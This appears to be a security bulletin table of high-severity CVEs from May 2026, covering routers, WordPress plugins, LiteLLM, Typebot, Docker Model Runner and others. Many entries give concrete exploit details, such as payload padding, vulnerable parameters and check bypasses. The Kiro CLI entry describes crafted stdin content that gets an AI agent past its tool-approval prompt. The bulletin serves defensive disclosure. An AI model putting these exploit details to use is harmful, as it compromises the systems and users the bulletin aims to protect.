High Vulnerabilities
| Primary Vendor — Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 10-Strike–Network Inventory Explorer | 10-Strike Network Inventory Explorer 8.54 contains a stack-based buffer overflow vulnerability in the registration key input field that allows local attackers to execute arbitrary code by triggering a structured exception handler overwrite. Attackers can craft a malicious registration key string with 4188 bytes of padding followed by SEH chain values and shellcode, then paste it into the registration dialog to achieve code execution with application privileges. | 2026-05-23 | 8.4 | CVE-2018-25344 |
| 10-Strike–Network Scanner | 10-Strike Network Scanner 3.0 contains a local buffer overflow vulnerability in the host name field that allows attackers to bypass SafeSEH protections and execute arbitrary code. Attackers can craft a malicious payload in the host name or address field and trigger the vulnerability through the Trace route or System information functions to achieve code execution. | 2026-05-23 | 8.4 | CVE-2018-25345 |
| 10Web–Form Maker | WordPress Form Maker Plugin 1.12.24 and below contains SQL injection vulnerabilities that allow authenticated attackers to manipulate database queries by injecting SQL code through the FormMakerSQLMapping and generete_csv actions. Attackers can submit POST requests with malicious SQL payloads in the name and search_labels parameters to extract, modify, or escalate privileges within the WordPress database. | 2026-05-23 | 7.1 | CVE-2018-25346 |
| acyba–AcyMailing An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress | The AcyMailing – An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 10.8.2. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify privileged AcyMailing configuration, export subscriber secret keys, and chain these actions into administrator account takeover when a target administrator email address is known. | 2026-05-20 | 8.8 | CVE-2026-5200 |
| Alinto–SOGo Webmail | SOGo versions 5.12.7 and prior contains a SQL injection vulnerability in the Access Control List management functionality that allows authenticated users to extract arbitrary data from the database by injecting SQL subqueries through the uid parameter of the addUserInAcls endpoint. Attackers can inject malicious SQL code to write extracted data into the sogo_acl table and retrieve it through the /acls API, establishing an out-of-band data exfiltration channel. | 2026-05-18 | 8.1 | CVE-2026-8851 |
| Audiograbber–Audiograbber | Audiograbber 1.83 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by exploiting structured exception handling mechanisms. Attackers can craft malicious input in the Interpret or Album fields that triggers a buffer overflow, overwriting SEH pointers and executing injected shellcode with application privileges. | 2026-05-23 | 8.4 | CVE-2018-25355 |
| AWS–Amazon Braket Python SDK | Insecure deserialization in the job results processing component in Amazon Braket SDK before 1.117.0 might allow a remote authenticated user with S3 write access to the job output bucket to achieve arbitrary code execution on any machine that processes job results. We recommend you upgrade to amazon-braket-sdk version 1.117.0 or later. | 2026-05-22 | 7.1 | CVE-2026-9291 |
| AWS–Amazon Redshift connector for Python | Unsafe use of Python’s eval() on server-received data in the vector_in() function in amazon-redshift-python-driver before 2.1.14 allows a rogue server or man-in-the-middle actor to execute arbitrary code on the client. To remediate this issue, users should upgrade to version 2.1.14. | 2026-05-18 | 9.8 | CVE-2026-8838 |
| AWS–Kiro CLI | Missing input source validation in the tool authorization prompt in Kiro CLI before 1.28.0 allows a local attacker to execute arbitrary tools, including shell commands, without user approval by crafting content that is piped to kiro-cli via stdin. We recommend you to upgrade to kiro-cli version 1.28.0 or later. | 2026-05-22 | 7.8 | CVE-2026-9255 |
| AWS–RabbitMQ AWS | Active debug code exists in the ARN resolver of amazon-mq rabbitmq-aws before version 0.2.1. A debug ARN scheme (arn:aws-debug:file) accepted by the PUT /api/aws/arn/validate validation endpoint might allow remote authenticated users to perform arbitrary file reads on any file accessible to the RabbitMQ process. To remediate this issue, customers should upgrade to version 0.2.1 of rabbitmq-aws. If RabbitMQ is configured to use TLS for connections, we also recommend rotating any associated private certificate keys. | 2026-05-20 | 7.7 | CVE-2026-9133 |
| baptisteArno–typebot.io | Typebot is a chatbot builder tool. In versions 3.15.2 and prior, the preview chat endpoint (POST /api/v1/typebots/{typebotId}/preview/startChat) allows unauthenticated users to achieve Server-Side Request Forgery (SSRF) by supplying a custom typebot definition with server-side code blocks. The fetch function exposed inside the isolated-vm sandbox calls Node.js native fetch without the SSRF validation (validateHttpReqUrl) that protects the HTTP Request block. This bypasses all SSRF mitigations added after GHSA-8gq9-rw7v-3jpr. Exploitation of this unauthenticated SSRF vulnerability can lead to cloud credential theft, internal network access and data exfiltration for any self-hosted Typebot deployments and hosted services. This issue has been fixed in version 3.16.0. | 2026-05-22 | 10 | CVE-2026-33712 |
| baptisteArno–typebot.io | Typebot is a chatbot builder tool. In versions 3.15.2 and prior, the RatingButton component in the embed package renders the user-controlled customIcon.svg field directly via Solid’s innerHTML directive without any sanitization, even though DOMPurify is already a dependency and is used elsewhere in the codebase (e.g., StreamingBubble.tsx). Because rating blocks are not flagged as isUnsafe by the import sanitizer and the builder preview renders bots inline on the builder’s own origin (builder.typebot.io) under a CSP permitting ‘unsafe-inline’, a malicious imported or collaborator-crafted typebot can execute arbitrary HTML/JS in the builder’s authenticated context, bypassing the Web Worker sandbox that protects Script blocks during preview. This allows session hijacking and privilege escalation within the builder application. This issue has been fixed in version 3.16.0. | 2026-05-22 | 8.7 | CVE-2026-28445 |
| baptisteArno–typebot.io | TypeBot is a chatbot builder tool. In versions prior to 3.16.0, SSRF protection for Webhook / HTTP Request blocks validates only the URL string, blocked hostname literals, and literal IP formats. It does not resolve DNS before allowing the request. As a result, a hostname such as ssrf-repro.example that resolves to 127.0.0.1, 169.254.169.254, or RFC1918/private space passes validation and is later fetched by the backend HTTP client. This enables server-side request forgery to loopback, cloud metadata, and private network targets. This issue has been resolved in version 3.16.0. | 2026-05-22 | 7.6 | CVE-2026-34207 |
| baptisteArno–typebot.io | TypeBot is a chatbot builder tool. Versions 3.15.2 and prior contain an SSRF via Open Redirect Bypass as the HTTP Request block and Code block validate the initial request URL via validateHttpReqUrl() to block private IPs and cloud metadata hostnames. However, the HTTP clients (ky and fetch) follow 302 redirects without re-validating the redirect destination. An authenticated user can point a bot block to an attacker-controlled server that responds with a redirect to an internal IP, causing the Typebot server to reach internal services. An authenticated Typebot user can reach AWS metadata (169.254.169.254), private subnets, and container-internal services. Exploitable to extract cloud IAM credentials or probe internal APIs inaccessible from the internet. This issue has been fixed in version 3.16.0. | 2026-05-22 | 7.7 | CVE-2026-39965 |
| baptisteArno–typebot.io | TypeBot is a chatbot builder tool. In versions 3.15.2 and prior, the fix for GHSA-4xc5-wfwc-jw47 (“Credential Theft via Client-Side Script Execution and API Authorization Bypass”) is incomplete. While the builder’s getCredentials tRPC endpoint was patched with workspace membership checks, the bot-engine runtime still allows any authenticated user to use credentials from any workspace via the preview chat endpoint. The bot-engine’s getCredentials() utility function uses a falsy check (if (workspaceId && …)) for workspace ownership validation. Since the preview endpoint accepts a client-controlled workspaceId field and the Zod schema allows empty strings, an attacker can supply workspaceId: “” to bypass credential ownership verification entirely. Exploitation can result in credential exfiltration, external service abuse, financial damage and a data breach. | 2026-05-22 | 7.1 | CVE-2026-39968 |
| Basamak Information Technology Consulting and Organization Trade Ltd. Co.–DernekWeb | Improper neutralization of input during web page generation (‘cross-site scripting’) vulnerability in Basamak Information Technology Consulting and Organization Trade Ltd. Co. DernekWeb allows Stored XSS. This issue affects DernekWeb: through 30122025. | 2026-05-18 | 8.8 | CVE-2026-7498 |
| Behance–Smartshop | Smartshop 1 contains a SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the id parameter. Attackers can send GET requests to category.php with UNION-based SQL injection payloads in the id parameter to extract sensitive database information including usernames and other data. | 2026-05-23 | 8.2 | CVE-2018-25340 |
| Behance–Smartshop | Smartshop 1 contains a SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the id parameter. Attackers can send GET requests to product.php with union-based SQL injection payloads in the id parameter to extract sensitive database information including usernames and database names. | 2026-05-23 | 8.2 | CVE-2018-25341 |
| Behance–Smartshop | Smartshop 1 contains a time-based blind SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the ‘searched’ parameter in search.php. Attackers can send GET requests with malicious SQL payloads like SLEEP commands to extract sensitive database information including product details and system data. | 2026-05-23 | 8.2 | CVE-2018-25342 |
| BerriAI–litellm | LiteLLM prior to 1.83.14 allows an authenticated internal_user to create API keys with access to routes that their role does not permit. When generating a key, the allowed_routes field is stored without verifying that the specified routes fall within the user’s own permissions. A key created with access to admin-only routes can then be used to reach those routes successfully, bypassing the role-based access controls that would otherwise block the request, enabling full privilege escalation from internal_user to proxy_admin. | 2026-05-21 | 8.8 | CVE-2026-47101 |
| BerriAI–litellm | LiteLLM prior to 1.83.10 allows a user to modify their own user_role via the /user/update endpoint. While the endpoint correctly restricts users to updating only their own account, it does not restrict which fields may be changed. A user who can reach this endpoint can set their role to proxy_admin, gaining full administrative access to LiteLLM including all users, teams, keys, models, and prompt history. Users with the org_admin role have legitimate access to this endpoint and can exploit this vulnerability without chaining any additional flaw. | 2026-05-21 | 8.8 | CVE-2026-47102 |
| Besen–BS20 EV Charging Station | A weakness has been identified in Besen BS20 EV Charging Station up to 20260426. Affected by this issue is some unknown functionality of the component OTA Update Installation Handler. This manipulation causes improper authorization. The attack is possible to be carried out remotely. A high degree of complexity is needed for the attack. The exploitation is known to be difficult. The original disclosure mentions, that “[t]hese vulnerabilities have been reported to Besen and we have received their acknowlegement that they are reviewing this as of April 2026.” | 2026-05-24 | 8.1 | CVE-2026-9397 |
| bestpractical–rt | RT is an open source, enterprise-grade issue and ticket tracking system. Versions 5.0.0 through 5.0.9 and 6.0.0 through 6.0.2 contain an SQL injection vulnerability. An authenticated user can craft input that is incorporated into database queries without proper validation, potentially allowing them to read or modify data in the RT database. This issue has been fixed in versions 5.0.10 and 6.0.3. If developers are unable to upgrade immediately, they can temporarily work around this issue by restricting RT account access to trusted users. | 2026-05-22 | 8.8 | CVE-2026-41075 |
| bestpractical–rt | RT is an open source, enterprise-grade issue and ticket tracking system. Versions 5.0.9 and prior in addition to 6.0.0 through 6.0.2 contain an authentication bypass vulnerability in RT installations that use LDAP/AD for user authentication. Under certain LDAP server configurations, an attacker may be able to authenticate as any LDAP-backed RT user without supplying valid credentials. This issue has been fixed in versions 5.0.10 and 6.0.3. If developers are unable to upgrade immediately, they can temporarily work around this issue by reviewing their LDAP server’s authentication policy to ensure it rejects unauthenticated bind attempts. Upgrading RT remains the recommended fix. | 2026-05-22 | 8.1 | CVE-2026-41076 |
| bestpractical–rt | RT is an open source, enterprise-grade issue and ticket tracking system. Versions 6.0.0 through 6.0.2 contain a Cross-Site Request Forgery (CSRF) vulnerability. An attacker who can induce a logged-in RT user to visit a malicious web page can trigger arbitrary state-changing actions in RT on that user’s behalf. This issue has been fixed in version 6.0.3. | 2026-05-22 | 7.1 | CVE-2026-41074 |
| Beyaz Computer Software Design Industry and Trade Ltd. Co.–CityPLus | Improper neutralization of input during web page generation (‘cross-site scripting’) vulnerability in Beyaz Computer Software Design Industry and Trade Ltd. Co. CityPLus allows Reflected XSS. This issue affects CityPLus: before V24.29750.1.0. | 2026-05-20 | 7.6 | CVE-2026-5783 |
| beycanpress–Account Switcher | The Account Switcher plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.0.2. This is due to the `rememberLogin` REST API endpoint using a loose comparison (`!=` instead of `!==`) for secret validation at `app/RestAPI.php:111`, combined with no validation that the secret is non-empty. When a target user has never used the “Remember me” feature, their `asSecret` user meta does not exist, causing `get_user_meta()` to return an empty string. An attacker can send an empty `secret` parameter, which passes the comparison (`” != ”` is `false`), and the endpoint then calls `wp_set_auth_cookie()` for the target user. Additionally, all REST routes use `permission_callback => ‘__return_true’` with no capability checks. This makes it possible for authenticated attackers, with Subscriber-level access and above, to switch to any user account including Administrator, ultimately granting themselves full administrative privileges. | 2026-05-20 | 8.8 | CVE-2026-6456 |
| Cisco–Cisco Secure Workload | A vulnerability in the access validation of internal REST APIs of Cisco Secure Workload could allow an unauthenticated, remote attacker to access site resources with the privileges of the Site Admin role. This vulnerability is due to insufficient validation and authentication when accessing REST API endpoints. An attacker could exploit this vulnerability if they are able to send a crafted API request to an affected endpoint. A successful exploit could allow the attacker to read sensitive information and make configuration changes across tenant boundaries with the privileges of the Site Admin user. | 2026-05-20 | 10 | CVE-2026-20223 |
| ConnectWise–Automate | The ConnectWise Automateâ„¢ Agent does not fully verify the authenticity of components obtained during plugin loading and self-update operations. This issue is addressed in Automate 2026.5. | 2026-05-21 | 8.8 | CVE-2026-9089 |
| constantcontact–Creative Mail Easier WordPress & WooCommerce Email Marketing | The Creative Mail – Easier WordPress & WooCommerce Email Marketing plugin for WordPress is vulnerable to SQL Injection via the ‘checkout_uuid’ parameter in all versions up to, and including, 1.6.9. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query in the `has_checkout_consent()` method. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-20 | 7.5 | CVE-2026-3985 |
| contest-gallery–Contest Gallery Upload & Vote Photos, Media, Sell with PayPal & Stripe | The Contest Gallery plugin for WordPress is vulnerable to SQL Injection via the ‘form_input’ parameter in versions up to, and including, 28.1.6. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query inside the unauthenticated ‘post_cg_gallery_form_upload’ AJAX action (specifically the ‘cb’ branch of the included users-upload-check.php, where $f_input_id is concatenated unquoted into ‘SELECT Field_Content FROM … WHERE id = $f_input_id’). The endpoint is gated only by a public frontend nonce (‘cg1l_action’ / ‘cg_nonce’) that is exposed in the page source of any public gallery page. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-19 | 7.5 | CVE-2026-8912 |
| cssigniterteam–AudioIgniter Music Player | The AudioIgniter plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 2.0.2. This is due to the handle_playlist_endpoint() function (hooked to template_redirect) accepting a user-controlled playlist ID via the audioigniter_playlist_id query var or the /audioigniter/playlist/{id}/ rewrite rule and returning playlist track data without performing any authentication, capability, or post_status check – only the post_type is validated. This makes it possible for unauthenticated attackers to view track metadata (titles, artists, audio URLs, buy links, download URLs, and cover images) of any playlist on the site, including those in draft, private, pending, or trash status. | 2026-05-22 | 7.5 | CVE-2026-8679 |
| Ctrlpanel-gg–panel | CtrlPanel is open-source billing software for hosting providers. In versions 1.1.1 and prior, the web-based installer (public/installer/index.php) is vulnerable to unauthenticated Remote Code Execution (RCE) because it performs the install.lock check only after including and executing form handler files, leaving installer endpoints reachable on already-installed instances. The handlers also pass unsanitized user input directly into shell commands, allowing an attacker to submit crafted requests that execute arbitrary commands on the server. The vulnerability stems from two combined weaknesses: (1) premature form handler execution before the lock file gate, and (2) unsafe use of user input in shell command construction. This issue is reported to be actively exploited in the wild. The issue has been fixed in version 1.2.0. | 2026-05-19 | 10 | CVE-2026-34234 |
| Ctrlpanel-gg–panel | CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contain a Stored Cross-Site Scripting (XSS) vulnerability in the ticket reply notification system. Unsanitized reply content ($newmessage) is stored directly in database notification payloads and later rendered unescaped via Blade’s {!! !!} syntax in the recipient’s browser. The flaw exists in both AppNotificationsTicketAdminAdminReplyNotification (triggered when a user replies, targeting admins) and AppNotificationsTicketUserReplyNotification (triggered when an admin replies, targeting users), allowing arbitrary JavaScript execution in the victim’s session context. A low-privileged attacker can exploit this to hijack admin sessions, harvest credentials via fake login prompts or keyloggers, and escalate privileges by performing administrative actions on the victim’s behalf. The reverse path also enables a malicious or compromised admin to target regular users in the same manner. This issue has been fixed in version 1.2.0. | 2026-05-19 | 8.7 | CVE-2026-34241 |
| Ctrlpanel-gg–panel | CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contains a broken access control vulnerability where multiple admin controllers enforce permission checks on form display methods but omit equivalent checks on the corresponding write methods, allowing any authenticated user to bypass RBAC via direct POST/PATCH requests. Controllers missing checks on write methods store() and update() include ApplicationApiController (admin.api.write), CouponController (admin.coupons.write), PartnerController (admin.partners.write), ShopProductController (admin.store.write), UsefulLinkController (admin.useful_links.write), and VoucherController (admin.voucher.write); ProductController (admin.products.edit), ServerController (write/change_owner/change_identifier), and UserController (write/change_email/change_credits/change_username/change_password/change_role/change_referral/change_ptero/change_serverlimit) are missing checks on update() only, and ActivityLogController exposed empty stub store()/update() methods that silently accepted any request. An authenticated attacker without admin write privileges can issue API credentials, generate unlimited coupons and vouchers, assign arbitrary partner commission and discount rates, alter shop product pricing and limits, reassign server ownership or identifiers, and modify user accounts including roles, credits, passwords, and linked Pterodactyl IDs to achieve full privilege escalation, as well as abuse logBackIn() without the login_as permission to interfere with admin impersonation sessions. This issue has been fixed in version 1.2.0. | 2026-05-19 | 8.1 | CVE-2026-34358 |
| D-Link–DIR-601 | D-Link DIR601 2.02NA contains a credential disclosure vulnerability that allows unauthenticated attackers to retrieve sensitive configuration data by manipulating the table_name parameter in POST requests. Attackers can send requests to /my_cgi.cgi with table_name values like admin_user, wireless_settings, and wireless_security to extract administrative credentials and wireless network keys in clear text. | 2026-05-23 | 7.5 | CVE-2018-25358 |
| Dell–PowerFlex Manager (Appliance) | Dell PowerFlex Manager, version(s) <=4.6.2, contain(s) an Exposure of Information Through Directory Listing vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Information exposure. | 2026-05-20 | 7.5 | CVE-2025-32750 |
| Digital Operations Services Inc.–WifiBurada | Exposure of private personal information to an unauthorized actor, Insufficiently Protected Credentials vulnerability in Digital Operations Services Inc. WifiBurada allows Authentication Bypass. This issue affects WifiBurada: through 21052026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-21 | 7.1 | CVE-2025-13477 |
| Divi Engine–Divi Form Builder | The Divi Form Builder plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.1.2. This is due to the plugin accepting a user-controlled ‘role’ parameter from POST data during user registration without validating it against the form’s configured default_user_role setting. This makes it possible for unauthenticated attackers to create administrator accounts by tampering with the role parameter during registration. | 2026-05-21 | 9.8 | CVE-2026-5118 |
| Docker–Docker Desktop | The vllm-metal inference backend in Docker Model Runner on macOS unconditionally sets trust_remote_code=True when loading model tokenizers, and runs without sandboxing. This causes transformers.AutoTokenizer.from_pretrained() to import and execute arbitrary Python files included in any model pulled from an OCI registry, resulting in arbitrary code execution on the Docker host as the Docker Desktop user when inference is triggered. Any container on the Docker network can trigger this by calling the model-runner.docker.internal API to pull a malicious model and request inference. | 2026-05-22 | 8.2 | CVE-2026-5817 |
| Docker–Docker Desktop | The MLX inference backend in Docker Model Runner on macOS uses the MLX-LM library, which unconditionally imports and executes arbitrary Python files from model directories via the model_file configuration field in config.json. When a model’s config.json specifies a model_file pointing to a Python file, MLX-LM uses importlib to load and execute it with no trust_remote_code gate or equivalent safety check. The MLX backend runs without sandboxing, resulting in arbitrary code execution on the Docker host as the Docker Desktop user. Any container on the Docker network can trigger this by calling the model-runner.docker.internal API to pull a malicious model from an attacker-controlled OCI registry and request inference. | 2026-05-22 | 8.2 | CVE-2026-5843 |
| Docker–Docker Desktop | The Docker CLI –use-api-socket flag bypasses Enhanced Container Isolation (ECI) restrictions in Docker Desktop. When ECI is enabled, Docker socket mounts from containers are denied unless explicitly allowed via the admin-settings configuration. However, the –use-api-socket flag adds the Docker socket mount via the HostConfig.Mounts field rather than the HostConfig.Binds field. The ECI enforcement in the Docker Desktop API proxy only inspected Binds, allowing the mount to pass unchecked. This grants a container full access to the Docker Engine socket and, if the host user has logged in to container registries, their authentication credentials. A local attacker with the ability to run Docker CLI commands can exploit this to escape ECI restrictions, access the Docker Engine, and potentially escalate privileges. | 2026-05-22 | 8.8 | CVE-2026-6406 |
| Dokploy–dokploy | Dokploy is a free, self-hostable Platform as a Service (PaaS). Versions 0.26.6 and below have OS command injection through the appName parameter. 3 chained issues cause this problem: inadequate input sanitization, lack of schema validation and direct shell interpolation. User-controlled application names are passed through inadequate sanitization (cleanAppName function only replaces spaces and converts to lowercase) before being interpolated directly into shell commands executed via execAsync() and execAsyncRemote(). An authenticated attacker can inject shell metacharacters (e.g., ;, $(), backticks, |, &) in the appName field during application creation, which are then executed with server-level privileges when service operations (start, stop, remove, scale) are triggered. This issue has been resolved in version 0.26.7. | 2026-05-18 | 9.9 | CVE-2026-27130 |
| Dolibarr–Dolibarr ERP CRM | Dolibarr ERP CRM 7.0.3 contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary code by injecting PHP code through the db_name parameter. Attackers can send a POST request to install/step1.php with malicious PHP code in the db_name parameter, then execute commands via the check.php endpoint using the cmd GET parameter. | 2026-05-23 | 9.8 | CVE-2018-25357 |
| Drupal–Drupal core | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Drupal Drupal core allows SQL Injection. This issue affects Drupal core: from 8.9.0 before 10.4.10, from 10.5.0 before 10.5.10, from 10.6.0 before 10.6.9, from 11.0.0 before 11.1.10, from 11.2.0 before 11.2.12, from 11.3.0 before 11.3.10. | 2026-05-20 | 9.8 | CVE-2026-9082 |
| DumbWareio–DumbAssets | DumbAssets through 1.0.11 contains a path traversal vulnerability in the POST /api/delete-file endpoint and filesToDelete array parameters that allows unauthenticated attackers to delete arbitrary files by supplying ../ sequences that bypass directory boundary validation. Attackers can exploit the optional and disabled-by-default authentication control to traverse outside the intended application directory and delete critical files such as server.js or package.json, causing complete denial of service. | 2026-05-18 | 9.1 | CVE-2026-45230 |
| Eclipse Foundation–Eclipse Glassfish | An authenticated Remote Code Execution (RCE) vulnerability was identified in GlassFish’s Administration Console. A user with access to the panel can send crafted requests that allow the execution of arbitrary operating system commands with the privileges of the application service user. | 2026-05-19 | 9.1 | CVE-2026-2586 |
| Eclipse Foundation–Eclipse Glassfish | A critical Remote Code Execution (RCE) vulnerability was identified in the server-side template rendering mechanism used by the Glassfish gadget handler. The application processes .xml files and evaluates user-supplied values within a context where Expression Language (EL) “expressions” are processed without proper sanitization or escaping. By injecting expressions such as #{7*7}, the server returns 49, confirming server-side EL evaluation. This issue allows a remote attacker to fully compromise the underlying host, enabling capabilities as reading/modifying data, executing arbitrary commands, persistence, and lateral movement. | 2026-05-19 | 9.6 | CVE-2026-2587 |
| Edimax–BR-6428NS | A flaw has been found in Edimax BR-6428NS 1.10. This affects the function formL2TPSetup of the file /goform/formL2TPSetup of the component POST Request Handler. This manipulation of the argument L2TPUserName causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-18 | 8.8 | CVE-2026-8775 |
| Edimax–BR-6428NS | A vulnerability has been found in Edimax BR-6428NS 1.10. This vulnerability affects the function formPPTPSetup of the file /goform/formPPTPSetup of the component POST Request Handler. Such manipulation of the argument pptpUserName leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-18 | 8.8 | CVE-2026-8776 |
| Edimax–BR-6428NS | A vulnerability was identified in Edimax BR-6428NS 1.10. The impacted element is the function formWanTcpipSetup of the file /goform/formWanTcpipSetup of the component POST Request Handler. Such manipulation of the argument pppUserName leads to buffer overflow. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-23 | 8.8 | CVE-2026-9294 |
| Edimax–BR-6428NS | A security flaw has been discovered in Edimax BR-6428NS 1.10. This affects the function formWirelessTbl of the file /goform/formWirelessTbl of the component POST Request Handler. Performing a manipulation of the argument vapurl results in buffer overflow. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-23 | 8.8 | CVE-2026-9295 |
| Edimax–BR-6675nD | A security vulnerability has been detected in Edimax BR-6675nD 1.12. Affected is the function formL2TPSetup of the file /goform/formL2TPSetup of the component POST Request Handler. Such manipulation of the argument L2TPUserName leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9380 |
| Edimax–BR-6675nD | A vulnerability was detected in Edimax BR-6675nD 1.12. Affected by this vulnerability is the function formPPPoESetup of the file /goform/formPPPoESetup of the component POST Request Handler. Performing a manipulation of the argument pppUserName results in buffer overflow. The attack may be initiated remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9381 |
| Edimax–BR-6675nD | A flaw has been found in Edimax BR-6675nD 1.12. Affected by this issue is the function formPPTPSetup of the file /goform/formPPTPSetup of the component POST Request Handler. Executing a manipulation of the argument pptpUserName can lead to buffer overflow. The attack may be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9382 |
| Edimax–BR-6675nD | A vulnerability was detected in Edimax BR-6675nD 1.12. This vulnerability affects the function formsetPPPoE of the file /goform/formsetPPPoE of the component POST Request Handler. Performing a manipulation of the argument pppUserName results in buffer overflow. It is possible to initiate the attack remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9399 |
| Edimax–BR-6675nD | A vulnerability has been found in Edimax BR-6675nD 1.12. Impacted is the function formWanTcpipSetup of the file /goform/formWanTcpipSetup of the component POST Request Handler. The manipulation of the argument pppUserName leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9401 |
| Edimax–BR-6675nD | A vulnerability was determined in Edimax BR-6675nD 1.12. The impacted element is the function formWlSiteSurvey of the file /goform/formWlSiteSurvey of the component POST Request Handler. This manipulation of the argument selSSID causes buffer overflow. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9403 |
| Edimax–EW-7438RPn | A security vulnerability has been detected in Edimax EW-7438RPn up to 1.31. The impacted element is an unknown function of the file /goform/formWpsStart of the component webs. Such manipulation of the argument pinCode/wlan-url leads to stack-based buffer overflow. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9344 |
| Edimax–EW-7438RPn | A vulnerability was detected in Edimax EW-7438RPn up to 1.31. This affects the function formWizSurvey of the file /goform/formWizSurvey of the component webs. Performing a manipulation of the argument ssid/manualssid/ip/mask/gateway results in buffer overflow. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9345 |
| Edimax–EW-7438RPn | A flaw has been found in Edimax EW-7438RPn up to 1.31. This impacts the function formWirelessTbl of the file /goform/formWirelessTbl of the component webs. Executing a manipulation of the argument submit-url can lead to buffer overflow. The attack may be performed from remote. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9346 |
| Edimax–EW-7438RPn | A vulnerability was found in Edimax EW-7438RPn up to 1.31. Affected by this vulnerability is an unknown functionality of the file /goform/mp of the component webs. The manipulation of the argument webs results in stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9348 |
| Edimax–EW-7438RPn | A security flaw has been discovered in Edimax EW-7438RPn 1.28a. Affected by this issue is the function formwlencrypt24g of the file /goform/formwlencrypt24g of the component POST Request Handler. The manipulation of the argument key1 results in buffer overflow. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9360 |
| edmonparker–Read More & Accordion | The Read More & Accordion plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 3.5.7. This is due to the ‘RadMoreAjax::importData’ function not restricting which database tables can be written to during import and not properly validating the imported data. This makes it possible for authenticated attackers, with permission granted by the site owner through the plugin’s role settings, to insert arbitrary rows into the ‘wp_users’ and ‘wp_usermeta’ tables, including the ‘wp_capabilities’ field, allowing them to create a new administrator account and gain administrator access to the site. | 2026-05-20 | 8.8 | CVE-2026-7467 |
| F5–NGINX JavaScript | NGINX JavaScript has a vulnerability when the js_fetch_proxy directive is configured with at least one client-controlled NGINX variable (for example, $http_*, $arg_*, $cookie_*) and a location invoking the ngx.fetch() operation from NGINX JavaScript. An unauthenticated attacker can exploit this vulnerability by sending crafted HTTP requests. This may cause a heap buffer overflow in the NGINX worker process leading to a restart. Additionally, attackers can execute code on systems with Address Space Layout Randomization (ASLR) disabled or when the attacker can bypass ASLR. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. | 2026-05-19 | 8.1 | CVE-2026-8711 |
| F5–NGINX Plus | NGINX Plus and NGINX Open Source have a vulnerability in the ngx_http_rewrite_module module. This vulnerability exists when a rewrite directive uses a regex pattern with distinct, overlapping Perl-Compatible Regular Expression (PCRE) captures (for example, ^/((.*))$) and a replacement string that references multiple such captures (for example, $1$2) in a redirect or arguments context. An unauthenticated attacker along with conditions beyond their control can exploit this vulnerability by sending crafted HTTP requests. This may cause a heap buffer overflow in the NGINX worker process leading to a restart. Additionally, attackers can execute code on systems with Address Space Layout Randomization (ASLR) disabled or when the attacker can bypass ASLR. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. | 2026-05-22 | 8.1 | CVE-2026-9256 |
